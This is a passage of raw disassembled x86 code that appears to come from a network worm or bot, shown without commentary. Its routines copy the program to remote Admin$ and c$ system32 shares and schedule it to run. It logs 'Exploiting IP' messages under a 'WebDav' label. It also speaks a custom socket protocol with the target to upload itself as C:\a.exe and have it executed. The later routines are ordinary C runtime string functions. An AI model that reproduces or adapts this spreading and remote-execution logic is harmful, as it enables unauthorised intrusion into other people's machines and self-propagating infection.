push ebx
push ebx
mov [ebp+var_20], offset aAdminSystem32 ; "Admin$\\system32"
mov [ebp+var_1C], offset aCWinntSystem32 ; "c$\\winnt\\system32"
mov [ebp+var_18], offset aCWindowsSystem ; "c$\\windows\\system32"
mov [ebp+var_14], offset aC ; "c"
mov [ebp+var_10], offset aD ; "d"
mov [ebp+var_8], ebx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2E8]
push eax
call dword_43A32C
test eax, eax
jnz loc_416162
cmp [ebp+var_8], ebx
jz loc_416162
mov edi, dword_4220FC
mov [ebp+var_4], ebx
mov esi, offset byte_42FD4C
loc_415FBA: ; CODE XREF: sub_415F00+14F�j
mov eax, [ebp+var_4]
push esi
push [ebp+eax*4+var_20]
lea eax, [ebp+var_158]
push [ebp+arg_8]
push offset aSSS_3 ; "%s\\%s\\%s"
push eax
call sub_416975
add esp, 14h
push ebx
lea eax, [ebp+var_158]
push eax
push esi
call edi ; CopyFileA
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_416068
call dword_422008 ; RtlGetLastWin32Error
cmp eax, 5
jnz short loc_416048
lea eax, [ebp+var_158]
push ebx
push eax
call sub_4172A4
test eax, eax
pop ecx
pop ecx
jnz short loc_416048
lea eax, [ebp+var_158]
lea edx, [eax+1]
loc_416012: ; CODE XREF: sub_415F00+117�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_416012
sub eax, edx
mov [ebp+var_C], eax
call sub_416B31
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_C]
push ebx
add dl, 30h
mov [ebp+eax+var_15D], dl
lea eax, [ebp+var_158]
push eax
push esi
call edi ; CopyFileA
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_416068
loc_416048: ; CODE XREF: sub_415F00+F4�j
; sub_415F00+107�j
inc [ebp+var_4]
cmp [ebp+var_4], 5
jb loc_415FBA
cmp [ebp+var_C], ebx
jnz short loc_416068
push [ebp+var_8]
call dword_43A3F8
jmp loc_416165
; ---------------------------------------------------------------------------
loc_416068: ; CODE XREF: sub_415F00+E9�j
; sub_415F00+146�j ...
mov ecx, [ebp+var_8]
mov eax, [ecx]
push 3Ch
pop edi
xor edx, edx
div edi
xor edx, edx
lea edi, [ebp+var_34]
push 208h
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
xor eax, eax
stosd
stosd
stosd
stosd
lea eax, [ebp+var_6F0]
push eax
push 0FFFFFFFFh
push esi
push ebx
push ebx
imul edx, 0EA60h
mov [ebp+var_34], edx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp+var_6F0]
mov [ebp+var_28], eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2E8]
push eax
call dword_43A368
test eax, eax
jnz loc_416162
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov edi, 422B02h
mov esi, eax
xor edx, edx
repe cmpsb
jnz short loc_4160E9
mov eax, offset aNoPassword ; "(no password)"
loc_4160E9: ; CODE XREF: sub_415F00+1E2�j
push eax
push [ebp+arg_0]
mov eax, [ebp+var_4]
push [ebp+eax*4+var_20]
mov eax, [ebp+arg_C8]
push [ebp+arg_8]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingI_0 ; "[%s]: Exploiting IP: %s, Share: \\%s, Us"...
lea eax, [ebp+var_4E8]
push 200h
push eax
call sub_416BCD
add esp, 20h
cmp [ebp+arg_D4], ebx
jnz short loc_416144
push ebx
push [ebp+arg_D0]
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+arg_34]
push eax
push [ebp+arg_C]
call sub_405D62
add esp, 14h
loc_416144: ; CODE XREF: sub_415F00+225�j
lea eax, [ebp+var_4E8]
push eax
call sub_401F0F
mov eax, [ebp+arg_C8]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
pop ecx
loc_416162: ; CODE XREF: sub_415F00+9D�j
; sub_415F00+A6�j ...
xor ebx, ebx
inc ebx
loc_416165: ; CODE XREF: sub_415F00+48�j
; sub_415F00+163�j
push 1
push 1
push [ebp+arg_8]
call dword_43A398
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_415F00 endp
; =============== S U B R O U T I N E =======================================
sub_416179 proc near ; CODE XREF: .text:00416311�p
; .text:00416388�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
cmp dword_42FF90, 0
push ebx
push esi
push edi
jz short loc_4161D5
mov eax, offset dword_42FF90
mov ebx, eax
loc_41618C: ; CODE XREF: sub_416179+5A�j
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push [esp+0DCh+arg_4]
lea esi, [esp+0E0h+arg_8]
push dword ptr [eax]
rep movsd
push [esp+0E4h+arg_0]
call sub_415F00
add esp, 0DCh
cmp eax, 1
jz short loc_4161DB
push 0C8h
call dword_422000 ; Sleep
add ebx, 4
cmp dword ptr [ebx], 0
mov eax, ebx
jnz short loc_41618C
loc_4161D5: ; CODE XREF: sub_416179+A�j
xor eax, eax
loc_4161D7: ; CODE XREF: sub_416179+65�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4161DB: ; CODE XREF: sub_416179+45�j
xor eax, eax
inc eax
jmp short loc_4161D7
sub_416179 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push eax
xor ebx, ebx
lea eax, [ebp-30h]
push offset aS_5 ; "\\\\%s"
push eax
mov [ebp-4], ebx
mov [ebp-14h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
call sub_416975
add esp, 0Ch
push 3E8h
lea eax, [ebp-62Ch]
push eax
push 0FFFFFFFFh
lea eax, [ebp-30h]
push eax
push ebx
push ebx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp-30h]
push eax
lea eax, [ebp-118h]
push offset aSIpc_0 ; "%s\\ipc$"
push eax
mov [ebp-40h], ebx
mov [ebp-34h], ebx
mov [ebp-4Ch], ebx
call sub_416975
add esp, 0Ch
lea eax, [ebp-118h]
mov [ebp-3Ch], eax
push ebx
mov eax, 422B02h
push eax
push eax
lea eax, [ebp-50h]
push eax
call dword_43A464
test eax, eax
jz short loc_416280
push 1
push ebx
lea eax, [ebp-118h]
push eax
call dword_43A398
xor eax, eax
jmp loc_4163A8
; ---------------------------------------------------------------------------
loc_416280: ; CODE XREF: .text:00416267�j
; .text:00416348�j
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-14h]
push eax
push 0FFFFFFFFh
lea eax, [ebp-4]
push eax
push 2
push ebx
lea eax, [ebp-62Ch]
push eax
call dword_43A39C
push 1
mov [ebp-0Ch], eax
push ebx
lea eax, [ebp-118h]
push eax
call dword_43A398
cmp [ebp-0Ch], ebx
jz short loc_4162C3
cmp dword ptr [ebp-0Ch], 0EAh
jnz short loc_416330
loc_4162C3: ; CODE XREF: .text:004162B8�j
mov eax, [ebp-4]
cmp eax, ebx
mov [ebp-10h], eax
jz short loc_416341
cmp [ebp-14h], ebx
mov [ebp-8], ebx
jbe short loc_416330
loc_4162D5: ; CODE XREF: .text:0041632E�j
mov eax, [ebp-10h]
cmp eax, ebx
jz short loc_416330
push ebx
push ebx
push 12Ch
lea ecx, [ebp-244h]
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call dword_4220D8 ; WideCharToMultiByte
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
lea eax, [ebp-30h]
push eax
lea eax, [ebp-244h]
lea esi, [ebp+8]
push eax
rep movsd
call sub_416179
add esp, 0D8h
cmp eax, 1
jz short loc_416330
add dword ptr [ebp-10h], 4
inc dword ptr [ebp-8]
mov eax, [ebp-8]
cmp eax, [ebp-14h]
jb short loc_4162D5
loc_416330: ; CODE XREF: .text:004162C1�j
; .text:004162D3�j ...
cmp [ebp-4], ebx
jz short loc_416341
push dword ptr [ebp-4]
call dword_43A3F8
mov [ebp-4], ebx
loc_416341: ; CODE XREF: .text:004162CB�j
; .text:00416333�j
cmp dword ptr [ebp-0Ch], 0EAh
jz loc_416280
cmp [ebp-4], ebx
jz short loc_41635C
push dword ptr [ebp-4]
call dword_43A3F8
loc_41635C: ; CODE XREF: .text:00416351�j
cmp dword ptr [ebp-0Ch], 5
jnz short loc_4163A5
cmp off_42FF40, ebx
jz short loc_4163A5
mov eax, offset off_42FF40
mov [ebp-8], eax
loc_416372: ; CODE XREF: .text:004163A3�j
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
lea esi, [ebp+8]
rep movsd
lea ecx, [ebp-30h]
push ecx
push dword ptr [eax]
call sub_416179
add esp, 0D8h
cmp eax, 1
jz short loc_4163A5
mov eax, [ebp-8]
add eax, 4
cmp [eax], ebx
mov [ebp-8], eax
jnz short loc_416372
loc_4163A5: ; CODE XREF: .text:00416360�j
; .text:00416368�j ...
xor eax, eax
inc eax
loc_4163A8: ; CODE XREF: .text:0041627B�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 698h
and byte ptr [ebp-5], 0
lea eax, [ebp-508h]
push eax
push 202h
call dword_43A3CC ; WSAStartup
test eax, eax
jz short loc_4163D4
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4163D4: ; CODE XREF: .text:004163CE�j
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push eax
call dword_43A434 ; inet_addr
push dword ptr [ebp+0BCh]
mov [ebp-60h], eax
call dword_43A514 ; ntohs
push 6
push 1
push 2
mov [ebp-62h], ax
mov word ptr [ebp-64h], 2
call dword_43A3BC ; socket
push 10h
lea ecx, [ebp-64h]
push ecx
push eax
mov [ebp-4], eax
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jz loc_416823
mov ebx, 1F4h
loc_416424: ; CODE XREF: .text:004164B6�j
cmp byte ptr [ebp-5], 1
lea eax, [ebp-4Ch]
jnz short loc_416434
push offset a022moptestmv1_ ; "022OPtestv1.1\r\n"
jmp short loc_416439
; ---------------------------------------------------------------------------
loc_416434: ; CODE XREF: .text:0041642B�j
push offset a022moptestmv_0 ; "022OPtestv1.2\r\n"
loc_416439: ; CODE XREF: .text:00416432�j
push eax
call sub_416975
pop ecx
lea eax, [ebp-4Ch]
pop ecx
lea edx, [eax+1]
loc_416447: ; CODE XREF: .text:0041644C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_416447
push 0
sub eax, edx
push eax
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A458 ; send
mov esi, dword_422000
push ebx
call esi ; Sleep
push 10h
pop ecx
xor eax, eax
push eax
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A324 ; recv
lea eax, [ebp-4Ch]
push offset a001myourClient ; "001Your client version is outdated!"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_4164C1
push dword ptr [ebp-4]
mov byte ptr [ebp-5], 1
call dword_43A4D0 ; closesocket
push 10h
lea eax, [ebp-64h]
push eax
push dword ptr [ebp-4]
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jnz loc_416424
jmp loc_416823
; ---------------------------------------------------------------------------
loc_4164C1: ; CODE XREF: .text:00416495�j
lea eax, [ebp-4Ch]
push offset a001m ; "001"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jnz short loc_416549
push ebx
call esi ; Sleep
cmp byte ptr [ebp-5], 1
lea eax, [ebp-4Ch]
jnz short loc_4164E8
push offset a022mmv1_1 ; "022v1.1\r\n"
jmp short loc_4164ED
; ---------------------------------------------------------------------------
loc_4164E8: ; CODE XREF: .text:004164DF�j
push offset a022mmv1_2 ; "022v1.2\r\n"
loc_4164ED: ; CODE XREF: .text:004164E6�j
push eax
call sub_416975
pop ecx
lea eax, [ebp-4Ch]
pop ecx
lea edi, [eax+1]
loc_4164FB: ; CODE XREF: .text:00416500�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4164FB
push 0
sub eax, edi
push eax
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A458 ; send
push ebx
call esi ; Sleep
push 10h
pop ecx
xor eax, eax
push eax
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A324 ; recv
lea eax, [ebp-4Ch]
push offset a001m ; "001"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jz loc_416823
loc_416549: ; CODE XREF: .text:004164D3�j
push 0
push 6
push offset a019m ; "019\r\n"
push dword ptr [ebp-4]
call dword_43A458 ; send
push ebx
call esi ; Sleep
push 10h
pop ecx
xor eax, eax
push eax
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A324 ; recv
push 7
mov edi, offset a020m ; "020\r\n"
lea esi, [ebp-4Ch]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_416823
push 41h
pop ecx
lea edi, [ebp-178h]
rep stosd
push 104h
lea eax, [ebp-178h]
push eax
xor esi, esi
push esi
call dword_422010 ; GetModuleFileNameA
lea eax, [ebp-178h]
push offset dword_422990
push eax
call sub_41720C
cmp eax, esi
pop ecx
pop ecx
mov [ebp-50h], eax
jz loc_416823
lea eax, [ebp-698h]
push eax
push 202h
call dword_43A3CC ; WSAStartup
test eax, eax
jnz loc_416823
lea eax, [ebp+0Ch]
push eax
call dword_43A434 ; inet_addr
push ebx
mov [ebp-70h], eax
call dword_43A514 ; ntohs
push 6
push 1
push 2
mov [ebp-72h], ax
mov word ptr [ebp-74h], 2
call dword_43A3BC ; socket
push 10h
lea ecx, [ebp-74h]
push ecx
push eax
mov [ebp-0Ch], eax
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jz loc_41681A
push esi
push 80h
push 3
push esi
push 1
push 80000000h
lea eax, [ebp-178h]
push eax
call dword_422034 ; CreateFileA
mov edi, eax
push esi
push edi
call dword_422094 ; GetFileSize
push edi
mov [ebp-54h], eax
call dword_42202C ; CloseHandle
push dword ptr [ebp-54h]
lea eax, [ebp-4Ch]
push offset aCA_exeD ; "C:\\a.exe\r\n%d\r\n"
push eax
call sub_416975
lea eax, [ebp-4Ch]
add esp, 0Ch
lea edi, [eax+1]
loc_416673: ; CODE XREF: .text:00416678�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_416673
push esi
sub eax, edi
push eax
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-0Ch]
call dword_43A458 ; send
push ebx
call dword_422000 ; Sleep
push 10h
pop ecx
xor eax, eax
push esi
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-0Ch]
call dword_43A324 ; recv
lea eax, [ebp-4Ch]
push offset aOkRedy ; "+OK REDY"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jz loc_41681A
push 10h
pop ecx
xor eax, eax
lea edi, [ebp-4Ch]
rep stosd
mov edi, [ebp-50h]
jmp short loc_4166F3
; ---------------------------------------------------------------------------
loc_4166D3: ; CODE XREF: .text:004166F7�j
push edi
push 40h
lea eax, [ebp-4Ch]
push 1
push eax
call sub_416FB7
add esp, 10h
push esi
push eax
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-0Ch]
call dword_43A458 ; send
loc_4166F3: ; CODE XREF: .text:004166D1�j
test byte ptr [edi+0Ch], 10h
jz short loc_4166D3
push 10h
pop ecx
xor eax, eax
push esi
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-0Ch]
call dword_43A324 ; recv
lea eax, [ebp-4Ch]
push offset aOkRcvd ; "+OK RCVD"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jz loc_41681A
push dword ptr [ebp-0Ch]
call dword_43A4D0 ; closesocket
push esi
push 0Eh
push offset a008mcA_exe ; "008C:\\a.exe\r\n"
push dword ptr [ebp-4]
call dword_43A458 ; send
push ebx
call dword_422000 ; Sleep
push 10h
pop ecx
xor eax, eax
push esi
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A324 ; recv
push 1Bh
mov edi, offset a001merrorExecu ; "001Error Executing File\r\n"
lea esi, [ebp-4Ch]
pop ecx
xor eax, eax
repe cmpsb
jz loc_41681A
xor esi, esi
push esi
push 6
push offset a100m ; "100\r\n"
push dword ptr [ebp-4]
call dword_43A458 ; send
push dword ptr [ebp-0Ch]
call dword_43A4D0 ; closesocket
push dword ptr [ebp-4]
call dword_43A4D0 ; closesocket
call dword_43A4DC ; WSACleanup
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0C4h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-378h]
push 200h
push eax
call sub_416BCD
add esp, 14h
cmp [ebp+0D0h], esi
jnz short loc_4167F7
push esi
push dword ptr [ebp+0CCh]
lea eax, [ebp-378h]
push eax
lea eax, [ebp+30h]
push eax
push dword ptr [ebp+8]
call sub_405D62
add esp, 14h
loc_4167F7: ; CODE XREF: .text:004167D8�j
lea eax, [ebp-378h]
push eax
call sub_401F0F
mov eax, [ebp+0C4h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp short loc_416834
; ---------------------------------------------------------------------------
loc_41681A: ; CODE XREF: .text:00416622�j
; .text:004166BE�j ...
push dword ptr [ebp-0Ch]
call dword_43A4D0 ; closesocket
loc_416823: ; CODE XREF: .text:00416419�j
; .text:004164BC�j ...
push dword ptr [ebp-4]
call dword_43A4D0 ; closesocket
call dword_43A4DC ; WSACleanup
xor eax, eax
loc_416834: ; CODE XREF: .text:00416818�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416840 proc near ; CODE XREF: start+5C�p start+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_416904
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_41686C
loc_41685B: ; CODE XREF: sub_416840+2A�j
mov al, [edi]
add edi, 1
test al, al
jz short loc_41689D
test edi, 3
jnz short loc_41685B
loc_41686C: ; CODE XREF: sub_416840+19�j
; sub_416840+42�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_41686C
mov eax, [edi-4]
test al, al
jz short loc_4168AC
test ah, ah
jz short loc_4168A7
test eax, 0FF0000h
jz short loc_4168A2
test eax, 0FF000000h
jnz short loc_41686C
loc_41689D: ; CODE XREF: sub_416840+22�j
sub edi, 1
jmp short loc_4168AF
; ---------------------------------------------------------------------------
loc_4168A2: ; CODE XREF: sub_416840+54�j
sub edi, 2
jmp short loc_4168AF
; ---------------------------------------------------------------------------
loc_4168A7: ; CODE XREF: sub_416840+4D�j
sub edi, 3
jmp short loc_4168AF
; ---------------------------------------------------------------------------
loc_4168AC: ; CODE XREF: sub_416840+49�j
sub edi, 4
loc_4168AF: ; CODE XREF: sub_416840+60�j
; sub_416840+65�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_4168C4
mov ebx, ecx
shr ecx, 2
jnz short loc_41691E
jmp short loc_4168E6
; ---------------------------------------------------------------------------
loc_4168C4: ; CODE XREF: sub_416840+79�j
; sub_416840+9D�j
mov dl, [esi]
add esi, 1
test dl, dl
jz short loc_41690A
mov [edi], dl
add edi, 1
sub ecx, 1
jz short loc_416900
test esi, 3
jnz short loc_4168C4
mov ebx, ecx
shr ecx, 2
jnz short loc_41691E
loc_4168E6: ; CODE XREF: sub_416840+82�j
; sub_416840+DC�j
mov ecx, ebx
and ecx, 3
jz short loc_416900
loc_4168ED: ; CODE XREF: sub_416840+BE�j
mov dl, [esi]
add esi, 1
mov [edi], dl
add edi, 1
test dl, dl
jz short loc_416902
sub ecx, 1
jnz short loc_4168ED
loc_416900: ; CODE XREF: sub_416840+95�j
; sub_416840+AB�j
mov [edi], cl
loc_416902: ; CODE XREF: sub_416840+B9�j
pop ebx
pop esi
loc_416904: ; CODE XREF: sub_416840+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41690A: ; CODE XREF: sub_416840+8B�j
; sub_416840+FA�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416914: ; CODE XREF: sub_416840+F6�j
; sub_416840+10E�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_4168E6
loc_41691E: ; CODE XREF: sub_416840+80�j
; sub_416840+A4�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416914
test dl, dl
jz short loc_41690A
test dh, dh
jz short loc_41696A
test edx, 0FF0000h
jz short loc_41695A
test edx, 0FF000000h
jnz short loc_416914
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41695A: ; CODE XREF: sub_416840+106�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41696A: ; CODE XREF: sub_416840+FE�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_416840 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416975 proc near ; CODE XREF: start+19�p start+48�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_418A1C
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_4169C7
dec [ebp+var_1C]
js short loc_4169BA
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4169C7
; ---------------------------------------------------------------------------
loc_4169BA: ; CODE XREF: sub_416975+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_418875
pop ecx
pop ecx
loc_4169C7: ; CODE XREF: sub_416975+36�j
; sub_416975+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_416975 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4169D0 proc near ; CODE XREF: sub_401141+2C9�p
; sub_409848+4521�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_4169F7
xor eax, eax
jmp short loc_4169F9
; ---------------------------------------------------------------------------
loc_4169F7: ; CODE XREF: sub_4169D0+21�j
mov eax, edi
loc_4169F9: ; CODE XREF: sub_4169D0+25�j
cld
pop edi
leave
retn
sub_4169D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416A00 proc near ; CODE XREF: sub_401141+6E�p
; sub_401141+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_416A9F
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_416A2C
shr ecx, 2
jnz loc_416AAF
jmp short loc_416A53
; ---------------------------------------------------------------------------
loc_416A2C: ; CODE XREF: sub_416A00+1F�j
; sub_416A00+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_416A66
test al, al
jz short loc_416A6E
test esi, 3
jnz short loc_416A2C
mov ebx, ecx
shr ecx, 2
jnz short loc_416AAF
loc_416A4E: ; CODE XREF: sub_416A00+AD�j
and ebx, 3
jz short loc_416A66
loc_416A53: ; CODE XREF: sub_416A00+2A�j
; sub_416A00+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_416A98
sub ebx, 1
jnz short loc_416A53
loc_416A66: ; CODE XREF: sub_416A00+39�j
; sub_416A00+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416A6E: ; CODE XREF: sub_416A00+3D�j
test edi, 3
jz short loc_416A8C
loc_416A76: ; CODE XREF: sub_416A00+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_416B1C
test edi, 3
jnz short loc_416A76
loc_416A8C: ; CODE XREF: sub_416A00+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_416B07
loc_416A93: ; CODE XREF: sub_416A00+9B�j
; sub_416A00+116�j
mov [edi], al
add edi, 1
loc_416A98: ; CODE XREF: sub_416A00+5F�j
sub ebx, 1
jnz short loc_416A93
pop ebx
pop esi
loc_416A9F: ; CODE XREF: sub_416A00+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_416AA5: ; CODE XREF: sub_416A00+C7�j
; sub_416A00+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_416A4E
loc_416AAF: ; CODE XREF: sub_416A00+24�j
; sub_416A00+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416AA5
test dl, dl
jz short loc_416AF9
test dh, dh
jz short loc_416AEF
test edx, 0FF0000h
jz short loc_416AE5
test edx, 0FF000000h
jnz short loc_416AA5
mov [edi], edx
jmp short loc_416AFD
; ---------------------------------------------------------------------------
loc_416AE5: ; CODE XREF: sub_416A00+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_416AFD
; ---------------------------------------------------------------------------
loc_416AEF: ; CODE XREF: sub_416A00+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_416AFD
; ---------------------------------------------------------------------------
loc_416AF9: ; CODE XREF: sub_416A00+CB�j
xor edx, edx
mov [edi], edx
loc_416AFD: ; CODE XREF: sub_416A00+E3�j
; sub_416A00+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_416B13
loc_416B07: ; CODE XREF: sub_416A00+91�j
xor eax, eax
loc_416B09: ; CODE XREF: sub_416A00+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_416B09
loc_416B13: ; CODE XREF: sub_416A00+105�j
and ebx, 3
jnz loc_416A93
loc_416B1C: ; CODE XREF: sub_416A00+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_416A00 endp
; =============== S U B R O U T I N E =======================================
sub_416B24 proc near ; CODE XREF: sub_40195E+39�p
; sub_402BA3+2E�p ...
arg_0 = dword ptr 4
call sub_4191CF
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_416B24 endp
; =============== S U B R O U T I N E =======================================
sub_416B31 proc near ; CODE XREF: sub_4017E8+57�p
; sub_4017E8:loc_40184B�p ...
call sub_4191CF
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_416B31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B53 proc near ; CODE XREF: sub_4017E8+4A�p
; sub_4042A2+23C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_419D70
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
call sub_4192C5
add esp, 10h
leave
retn
sub_416B53 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416B90 proc near ; CODE XREF: sub_40402D+8�p
; sub_405163+A�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_416BA5
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_416BA5: ; CODE XREF: sub_416B90+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_416BAA: ; CODE XREF: sub_416B90+2C�j
sub ecx, 1000h
